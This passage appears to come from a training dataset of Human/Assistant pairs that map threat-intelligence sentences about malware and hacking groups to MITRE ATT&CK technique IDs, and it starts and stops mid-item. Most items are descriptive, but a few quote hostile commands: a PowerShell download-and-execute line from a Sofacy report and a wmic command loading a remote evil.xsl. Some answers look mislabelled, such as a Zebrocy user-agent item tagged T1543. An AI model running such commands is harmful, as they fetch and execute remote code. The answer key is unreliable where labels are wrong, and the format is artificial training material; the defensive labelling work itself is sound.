payloads and performing local enumeration.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has made their XMRIG payloads persistent as a Windows Service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When used maliciously, LKMs can be a type of kernel-mode Rootkit that run with the highest operating system privilege .### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may target resource intensive features of web applications to cause a denial of service .### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pasam creates a backdoor through which remote attackers can delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum was seen using NetSess to discover NetBIOS sessions.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has collected the PID of a malicious process.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dok downloads and installs Tor via homebrew.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may rely on a user running a malicious image to facilitate execution.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has been embedded into modified OpenSSH binaries to gain persistent access to SSH credential information.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They have also exploited CVE-2020-0688 against the Microsoft Exchange Control Panel to regain access to a network.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may rent Virtual Private Servers  that can be used during targeting.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lastly, the new variant of RogueRobin is capable of using the Google Drive cloud service for its C2 channel, suggesting that DarkHydrus may be shifting to abusing legitimate cloud services for their infrastructure### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs downloads additional files that are base64-encoded and encrypted with another cipher.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing was executed with an Ubuntu container entry point that runs shell scripts.### Assistant: T1609: Container Administration Command" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot recursively generates a list of files within a directory and sends them back to the control server.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Evilnum has sent spearphishing emails designed to trick the recipient into opening malicious shortcut links which downloads a .LNK file.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has access to destructive malware that is capable of overwriting a machine's Master Boot Record .### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information may also include specifics regarding network devices and other infrastructure.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avenger can extract backdoor malware from downloaded images.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CopyKittens digitally signed an executable with a stolen certificate from legitimate company AI Squared.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM can execute Powershell commands sent from its C2 server.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used Visual Basic to download malicious payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used Reg to query the Registry for installed programs.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If a victim meets certain criteria, T9000 uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used whoami and query user to obtain information about the victim user.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp uses Python scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Equation has used an encrypted virtual file system stored in the Windows Registry.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony has collected the Service Pack, language, and region information to send to the C2.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Custom tools may also be used to gather file and directory information and interact with the Native API.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With sufficient permissions, a compromised account can gain almost unlimited access to data and settings via the global admin role.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FYAnti can search the C:\Windows\Microsoft.NET\ directory for files of a specified size.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Process injection is a method of executing arbitrary code in the address space of a separate live process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command-line examples: * Local File: wmic process list /FORMAT:evil.xsl * Remote File: wmic os get /FORMAT:”https://example.com/evil.xsl” Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has delivered malicious Microsoft Office attachments via spearphishing emails.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Downdelph uses RC4 to encrypt C2 responses.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs uses HTTPS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The OwaAuth web shell is likely created with a builder, given that the PE compile time of the binary does not change between instances and the configuration fields are padded to a specific size### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT uses the PowerShell command Reflection.Assembly to load itself into memory to aid in execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook is delivered via a malicious Word document inside a zip file.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can zip files before exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Trojan will save the output of the command to %TEMP%\win.txt and send the contents to the C2 server or “The length of Cmd result file is ziro!” if the command was unsuccessful### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker has obfuscated its code to prevent its removal from host machines.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT18 can upload a file to the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerStallion has been used to monitor process lists.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has obtained information on security software, including security logging information that may indicate whether their malware has been detected.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WIRTE has used Regsvr32.exe to trigger the execution of a malicious script.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,11 AV detection If there is no Avast install present, the script proceeds to the final .dll execution using regsvr32 and quits### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search freely available technical databases for information about victims that can be used during targeting.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The CozyCar configuration file has been encrypted with RC4 keys.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST attempted to disable software security services following checks against a FNV-1a + XOR hashed hardcoded blocklist.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The White Company has sent phishing emails with malicious Microsoft Word attachments to victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,/sbin/emond ### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After encrypting its own log files, the log encryption module in Prikormka deletes the original, unencrypted files from the host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Systemd timers may be activated remotely via the systemctl command line utility, which operates over SSH.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has required user execution of a malicious MSI installer.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke steals user files from network shared drives with file extensions and keywords that match a predefined list.### Assistant: T1039: Data from Network Shared Drive" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has modified DNS resolvers to evade DNS monitoring tools.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,boom! Deletes GID.bin, ShwDoc.VBS and ShwDoc.srv files, as well as the scheduled task whose name a GUID stored in the GID.bin file### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries use launchctl to execute commands and programs as Launch Agents or Launch Daemons.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot has been executed via a scheduled task.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkHydrus leveraged PowerShell to download and execute additional scripts for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can upload files from compromised hosts.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 routinely removed their tools, including custom backdoors, once remote access was achieved.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples include ListObjectsV2 in AWS and List Blobs in Azure .### Assistant: T1619: Cloud Storage Object Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has checked for the existence of specific files including /usr/sbin/setenforce and /etc/selinux/config.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar captures screenshots of the victim’s screen.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS creates a scheduled task to establish by executing a malicious payload every subsequent minute.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use a file exfiltration tool to copy files to C:\ProgramData\Adobe\temp prior to exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group leveraged Mimikatz to extract Windows Credentials of currently logged-in users and steals passwords stored in browsers.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic uses the tasklist /svc command to list the services on the system.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware, such as HAMMERTOSS.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used 'adobeupdate.dat' as a PlugX loader, and a file named 'OneDrive.exe' to load a Cobalt Strike payload.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can disguise JavaScript files as PDFs.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil has used encrypted strings and configuration files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke has a command to download a file.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages to provide a layer of abstraction between API functions and files.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,From the 185.25.50[.]93 C2 IP, we discovered another hard-coded user agent being used by Zebrocy: Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko We observed several samples of Zebrocy using this user agent targeting the foreign affairs ministry of a large Central Asian nation### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao can download additional files to the infected system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has used FTP protocol for C2 communication.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specific COM objects also exist to directly perform functions beyond code execution, such as creating a Scheduled Task/Job, fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following shows this unused command, which exposed an additional server within Sofacy’s infrastructure would download and execute an encoded PowerShell script from 92.114.92[.]102: C:\\Programs\\Microsoft\\MSOffice\\Word.exe\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -Whidden $e=(New-ObjectSystem.Net.webClient).downloadString('hxxp://92.114.92[.]102:80/d');powershell -enc $e # The unused command above appears to be related to previous attacks, specifically attacks that occurred in November 2017 as discussed by McAfee and ESET### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework., LoadPackagedLibrary() ### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian has the ability to use HTTP for its C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The attackers used spear phishing emails combined with malicious HWP documents created using Hancom Hangul Office Suite### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET uses the chmod +x command to grant executable permissions to the malicious file.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key HKCU\Software\Microsoft\Office test\Special\Perf to execute code.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ragnar Locker has attempted to terminate/stop processes and services associated with endpoint security products.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY has used python scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's dispatcher can be executed as a service.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to gather metadata from a file and to search for file and directory names.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We recently mentioned this tool in another report on April 16, as this variant of the BONDUPDATER tool used DNS tunneling to communicate with its C2, specifically using TXT queries to receive information from the C2 server### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Regin leveraged several compromised universities as proxies to obscure its origin.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MURKYTOP has the capability to scan for open ports on hosts in a connected network.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 deleted files from the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIVEHANDS has the ability to enumerate files on a compromised host in order to encrypt files with specific extensions.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon has disguised malicious programs as Google Chrome, Adobe, and VMware executables.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,S-Type may create a temporary user on the system named “Lost_{Unique Identifier}” with the password “pond~!### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon can use parent PID spoofing to elevate privileges.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WINDSHIELD is capable of file deletion along with other file system interaction.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may rely upon a user opening a malicious file in order to gain execution.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to RIPTIDE and HIGHTIDE, the WATERSPOUT backdoor is an HTTP-based backdoor that communicates with its C2 server### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher checks if the victim OS is 32 or 64-bit.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MESSAGETAP checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This behavior is distinct from Disk Content Wipe and Disk Structure Wipe because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group tools can delete files used during an infection.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware may also use IFEO to Impair Defenses by registering invalid debuggers that redirect and effectively disable various system and security applications.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has sent emails with malicious DOCX, CHM, LNK and ZIP attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also collects the system's MAC address with getmac and domain configuration with net config workstation.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,System and user-wide environment variable scopes are specified in the Registry, where a Component Object Model object can be registered as a profiler DLL.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer can gather system information, the computer name, OS version, drive and serial information from the victim's machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group's malware can take screenshots of the compromised computer every minute.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHOTPUT is obscured using XOR encoding and appended to a valid GIF file.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the file is executed, the ThiefQuest code is executed first.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has used DOCX files to download malicious DOT document templates.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has encrypted its C2 traffic with RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used malware to decrypt encrypted CAB files.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to determine the domain name and whether a proxy is configured on a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has used Pastebin, Gitee, and GitLab for Command and Control.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can use a modified base32 encoding to encode data within the subdomain of C2 requests.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used a modified version of HTRAN to redirect connections between networks.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has used custom packers to protect its payloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIVEHANDS has the ability to delete volume shadow copies on compromised hosts.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole gathers information on the IP forwarding table, MAC address, configured proxy, and network SSID.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can retrieve passwords from messaging and mail client applications.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the event this is successful, the malware will use the following path to store any dropped files: %COMMONPROGRAMFILES%\services\ In the event it is not successful, this alternative path will be used instead: %APPDATA%\microsoft\mmc\ Reaver.v2 proceeds to decrypt an embedded file using a simple XOR obfuscation routine### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTPBrowser abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For that we can use a Python script, included in Appendix B – Python Scripts### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to collect the username on the infected host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has the ability to base64 encode and XOR encrypt strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke has commands to get the time the machine was built, the time, and the time zone.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth collects information from the clipboard by using the OpenClipboard and GetClipboardData libraries.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stolen code signing certificates used to sign malware### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HELLOKITTY can use an embedded RSA-2048 public key to encrypt victim data for ransom.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3 Targeted lure content In one of the documents, the victim is presented with what appears to be an obfuscated document with the NATO EOD seal and text alluding to the targeted nation state### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy uses SSL and AES ECB for encrypting C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack can collect the RegisteredOwner, RegisteredOrganization, and InstallDate registry values.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spark can use cmd.exe to run commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 created a RAR archive of targeted files for exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Regsvr32, odbcconf.exe has a REGSVR flag that can be misused to execute DLLs .### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon has used a call to LoadLibrary to load its installer.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 removed evidence of email export requests using Remove-MailboxExportRequest.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy uses the tasklist and wmic process get Capture, ExecutablePath commands to gather the processes running on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Evilnum has used malicious JavaScript files on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StreamEx establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Environmental keying is an implementation of Execution Guardrails that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.### Assistant: T1566: 